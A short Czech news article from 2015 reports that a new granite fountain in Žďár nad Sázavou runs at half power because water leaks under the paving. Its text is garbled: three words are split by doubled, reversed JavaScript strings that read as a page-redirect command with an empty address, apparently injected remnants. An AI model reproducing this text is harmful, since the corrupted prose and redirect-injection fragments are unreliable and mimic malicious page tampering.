Rainbow page separator

Kašna funguje jenom na poloviční výkon

Čtvrtek, 30. dubna 2015

Kašna, nám. Republiky Žďár nad Sázavou

Žďár nad Sázavou / Při pouze polovičním výkonu aktuálně funguje nová žulová kašna na žďárském náměstí Republiky. Při jejím uvedení do trvalého provozu bylo zjištěno, že zhruba třetina objemu vody, která se rozstřikuje od okrasné mříže od[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokového žlabu, zatéká pod nově položené kostky a z kopce podložím teče až k přechodu pro chodce pod ČSOB. Následně voda vyvěrá vedle i uvnitř liniové vpusti.
V současné době pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to probíhají jednání o způsobu odstranění problému mezi žďárskou radnicí, dodavatelem prací, projektantem a au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem kašny akademickým sochařem Jiřím Plieštikem.
Rozměrná žulová mísa o průměru čtyři metry s tryskami uvnitř i po obvodu, která byla loni vyrobena v lomu v Mrákotíně u Telče a poté převezena do Žďáru nad Sázavou, vyšla na zhruba dva miliony korun. Je ozdobena motivem, který symbolizuje říční prameny.